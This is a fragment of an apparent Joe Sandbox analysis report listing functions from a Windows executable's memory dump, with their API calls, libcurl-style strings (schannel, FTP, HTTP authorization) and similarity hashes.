strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Blocking call in progress, xrefs: 00007FF7F8D12919

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Blocking call in progress
API String ID: 4135170618-1991276421
Opcode ID: a5c60e1ee8bf5d81184b94d2fb959976981809f147ea94a7ac8ed459eb6c28b5
Instruction ID: aa2b82b2292ee3d60d162b0c9a82d352460849d79ddfa03aab0fa2214ea0958a
Opcode Fuzzy Hash: a5c60e1ee8bf5d81184b94d2fb959976981809f147ea94a7ac8ed459eb6c28b5
Instruction Fuzzy Hash: 0EF01D25A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12925 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Descriptor is not a socket, xrefs: 00007FF7F8D12925

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Descriptor is not a socket
API String ID: 4135170618-1741256102
Opcode ID: 437ba6f16f8799c3799ddd660ac0f6595b1bccea247c82ec74103ca5dd1dd095
Instruction ID: 76a93275b574ff71a43f7939812de4a30844d20a47ff208e05a3a05c588ee98f
Opcode Fuzzy Hash: 437ba6f16f8799c3799ddd660ac0f6595b1bccea247c82ec74103ca5dd1dd095
Instruction Fuzzy Hash: 9FF01D25A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12931 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Need destination address, xrefs: 00007FF7F8D12931

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Need destination address
API String ID: 4135170618-3579207779
Opcode ID: ba1d8ae39c5db8bc75cff9dff4939cde946e268064c5742541bd68eb4ecb1ea4
Instruction ID: 7391ddee794c4b1ded1563cf1498d8b48eacf3d0636a045c6a20df2249d94b5b
Opcode Fuzzy Hash: ba1d8ae39c5db8bc75cff9dff4939cde946e268064c5742541bd68eb4ecb1ea4
Instruction Fuzzy Hash: 20F01D25A0DA4686E740AF61A504129F321FF5CBD5F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D263B8 Relevance: 10.2, APIs: 8, Instructions: 169stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D26437
strchr.LIBVCRUNTIME ref: 00007FF7F8D2645E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D26543
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D26560

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$freemalloc
String ID:
API String ID: 1422302691-0
Opcode ID: 1ce208d5ec36f2d3bb597d2c04d005f4b68a8429ae38c5918308a543f92300fa
Instruction ID: 4f7f79093ed44a67a8c7f39e30b9b6284b357e8fd64dc71db2003f644218ff1b
Opcode Fuzzy Hash: 1ce208d5ec36f2d3bb597d2c04d005f4b68a8429ae38c5918308a543f92300fa
Instruction Fuzzy Hash: A7519011E0D38295FB25BB267414279DA905F5DB80F8C4475CEAD073D6DE3CF44AA3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2127C Relevance: 10.1, APIs: 8, Instructions: 53COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D2129D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D212B3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D212C9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D212DF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D212F5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D2130B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D21321
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D21337

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f3556a69d0b69a32f49c0ebe6b53497d61e2689ed8e070d1116b6ec3f7f9066e
Instruction ID: 086812a99c63ba3822e730e54d18603a91c5d42944ba7887685e43bee942a3fe
Opcode Fuzzy Hash: f3556a69d0b69a32f49c0ebe6b53497d61e2689ed8e070d1116b6ec3f7f9066e
Instruction Fuzzy Hash: F4216425649A46D2DB14AF62FD64468E324FF9CB80F8C1031CE2F477A1CE2CE4589798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0D7D0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0D859
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0D954
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0D989

Strings

unmatched close brace/bracket, xrefs: 00007FF7F8D0DA54
out of memory, xrefs: 00007FF7F8D0D96B
too many globs, xrefs: 00007FF7F8D0DA70

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: malloc$isalnum
String ID: out of memory$too many globs$unmatched close brace/bracket
API String ID: 325662795-3324938048
Opcode ID: f5e6ed1f7fbc64d85857c151445cfd862b13009f39ac61ca5834e9a916b28999
Instruction ID: 6aa74541e62180976f350f6cecc09168a0fcdaee1d68c02bf228919a732b7138
Opcode Fuzzy Hash: f5e6ed1f7fbc64d85857c151445cfd862b13009f39ac61ca5834e9a916b28999
Instruction Fuzzy Hash: DE81D466A087818AF710DF15E4043BABBA4BF08BD8F544236DE6D57798CF38D058E3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D38AB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 85stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D38ADA
strchr.LIBVCRUNTIME ref: 00007FF7F8D38BAB
strchr.LIBVCRUNTIME ref: 00007FF7F8D38BBB
strchr.LIBVCRUNTIME ref: 00007FF7F8D38BCF
strchr.LIBVCRUNTIME ref: 00007FF7F8D38BDF

Strings

;type=, xrefs: 00007FF7F8D38AFD, 00007FF7F8D38B23

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$malloc
String ID: ;type=
API String ID: 2541711312-3507045495
Opcode ID: 845ea99e6000a35b575881edfaaffdda2adb82dae0fb81f3ba03170cdca312ed
Instruction ID: ed4ba786f34ba9321bd914be905521fe28b18fdd1c0e719124eafc298ad55b6a
Opcode Fuzzy Hash: 845ea99e6000a35b575881edfaaffdda2adb82dae0fb81f3ba03170cdca312ed
Instruction Fuzzy Hash: 68418172B0978695EB18AB25D5003A8E790FF4DB44F884175CB6D033D1DF7DE058A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D40678 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D406FC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D40750
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D40762
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D40780

Strings

Proxy-, xrefs: 00007FF7F8D40710
%sAuthorization: Negotiate %s, xrefs: 00007FF7F8D40721

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: %sAuthorization: Negotiate %s$Proxy-
API String ID: 1294909896-2414494888
Opcode ID: f01fa2ed12cafdece1a06d7669750555970a9e0ab2ac527e5008d56ba6723131
Instruction ID: 61da334fb4d4edbb182413817218136707ee845cf3bc87b2a1929e0409fc4d63
Opcode Fuzzy Hash: f01fa2ed12cafdece1a06d7669750555970a9e0ab2ac527e5008d56ba6723131
Instruction Fuzzy Hash: 1931522660CF4682EB50EB51F8403BAE760FF98B90F480032DA6D576E4DF7CD4099798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3EEA0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175networkCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3EF69
WSAGetLastError.WS2_32 ref: 00007FF7F8D3F0AC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3F110

Strings

select/poll on SSL socket, errno: %d, xrefs: 00007FF7F8D3F0B5
schannel: timed out sending data (bytes sent: %zd), xrefs: 00007FF7F8D3F0D1

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLastfreemalloc
String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
API String ID: 1010545285-3891197721
Opcode ID: ba145afff6e5f522989f16d6286bc4a0f190e14485ee5fbb2edcb13d6af5d281
Instruction ID: 007e1e67a1f375d831fadb576d5f306438fd523c8b2b9123d69bd6124bb7043b
Opcode Fuzzy Hash: ba145afff6e5f522989f16d6286bc4a0f190e14485ee5fbb2edcb13d6af5d281
Instruction Fuzzy Hash: FD71D232B09B458AF710EB65E404BACB3A1EF487A8F844135DE2D577D4DE38E40AD794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0DC64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D0DCF3
__swprintf_l.LIBCMT ref: 00007FF7F8D0DDF2
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0DE25

Strings

internal error: invalid pattern type (%d), xrefs: 00007FF7F8D0DD9D
%0*ld, xrefs: 00007FF7F8D0DCDE

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l$_strdup
String ID: %0*ld$internal error: invalid pattern type (%d)
API String ID: 3016644273-4294015770
Opcode ID: 14a02ed22ecfdcbd300f02462d670adcbff3c2091a6827b7582fa210a29e04f5
Instruction ID: 7d0a0e06180a41f412be1153ec34d1501c823d4ad9863ca955ac715ced0b6ad1
Opcode Fuzzy Hash: 14a02ed22ecfdcbd300f02462d670adcbff3c2091a6827b7582fa210a29e04f5
Instruction Fuzzy Hash: D2510A32A0C28545E715AB2491447BCEB90EF19B64FA84333CA7D473D8CE29E44BD7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1EFDC Relevance: 8.9, APIs: 7, Instructions: 136stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D1F025
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F0E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F12F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F176

Part of subcall function 00007FF7F8D10364: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D103B1

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F198
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F1AD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F1C3

Part of subcall function 00007FF7F8D1F1E8: strchr.LIBVCRUNTIME ref: 00007FF7F8D1F22D
Part of subcall function 00007FF7F8D1F1E8: strchr.LIBVCRUNTIME ref: 00007FF7F8D1F254
Part of subcall function 00007FF7F8D1F1E8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F309
Part of subcall function 00007FF7F8D1F1E8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F344

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$mallocstrchr
String ID:
API String ID: 3005890304-0
Opcode ID: 444eda21fc4e538332b76c7407c343f66f5d66c9f86f31eb7a5ccc632876f2ee
Instruction ID: 9a1280c4a4a3e5269e0eb2214ac8d0e2f25bf0c37b64f049ac218a880d5e25e5
Opcode Fuzzy Hash: 444eda21fc4e538332b76c7407c343f66f5d66c9f86f31eb7a5ccc632876f2ee
Instruction Fuzzy Hash: 07516E26608F9285EB10EF32E8506ADA7A4FF4CBD8F885431DE5E17758CE38D0499394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3C19C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 130stringCOMMON

Download Yara Rule

APIs

strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D3C20C

Strings

Found %I64u bytes to download, xrefs: 00007FF7F8D3C24A
Failed to parse FETCH response., xrefs: 00007FF7F8D3C378
Written %I64u bytes, %I64u bytes are left for transfer, xrefs: 00007FF7F8D3C2D1

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strtoll
String ID: Failed to parse FETCH response.$Found %I64u bytes to download$Written %I64u bytes, %I64u bytes are left for transfer
API String ID: 2044156862-2122842539
Opcode ID: aafc00ecd766ddc62470bbd8c3434e559b343eec8b0ea804b0316d6f46c5f18d
Instruction ID: 6a5a40b663e710e03e8a1ad825a14e7025de8f388fb4602a2e82d49ad19a6ebb
Opcode Fuzzy Hash: aafc00ecd766ddc62470bbd8c3434e559b343eec8b0ea804b0316d6f46c5f18d
Instruction Fuzzy Hash: 0951AD6260868296EB14AF26E4402ADF790FF49BD0F984131DABD176D1CF3CE159B394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D24C94 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D24DD3

Strings

%x%s, xrefs: 00007FF7F8D24DBD
operation aborted by callback, xrefs: 00007FF7F8D24D08
Read callback asked for PAUSE when not supported!, xrefs: 00007FF7F8D24D36
read function returned funny value, xrefs: 00007FF7F8D24D7E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l
String ID: %x%s$Read callback asked for PAUSE when not supported!$operation aborted by callback$read function returned funny value
API String ID: 1488884202-1291304620
Opcode ID: ce392f7511f7acfad5f7fb7d0d61469b5d14937d18caabb531c99bf32884f39a
Instruction ID: 7f9719eef414fe7af981f1f74c0dd925f47f9e23e9077e770ef3410f3ca0e00d
Opcode Fuzzy Hash: ce392f7511f7acfad5f7fb7d0d61469b5d14937d18caabb531c99bf32884f39a
Instruction Fuzzy Hash: DC41D062A086C6A6F758EB21E4443F8E691BF087A4F880231DE3D072D1DF7CA499E354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D33BA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D33C63
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D33C89

Strings

RETR, xrefs: 00007FF7F8D33C27
LIST, xrefs: 00007FF7F8D33C30
%s %s, xrefs: 00007FF7F8D33C5C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: %s %s$LIST$RETR
API String ID: 2941638530-469064825
Opcode ID: 58f4b52fed464b4a8ec3b91b5802b3e0923a550d5eee7ea010cbcebe2f1aa79c
Instruction ID: e397d508d72297bbbff2852ef75e37395cd6aada17ffcaf567ded87e1a87ddfd
Opcode Fuzzy Hash: 58f4b52fed464b4a8ec3b91b5802b3e0923a550d5eee7ea010cbcebe2f1aa79c
Instruction Fuzzy Hash: 5A31B172A0CBC295E758AB25E5500BAFB90EF49B90F988136DB7D033C5DF28D448E394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D171AC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1725B

Strings

[%s %s %s], xrefs: 00007FF7F8D17245
Header, xrefs: 00007FF7F8D17222, 00007FF7F8D17232
Data, xrefs: 00007FF7F8D17205
from, xrefs: 00007FF7F8D17239

Memory Dump Source

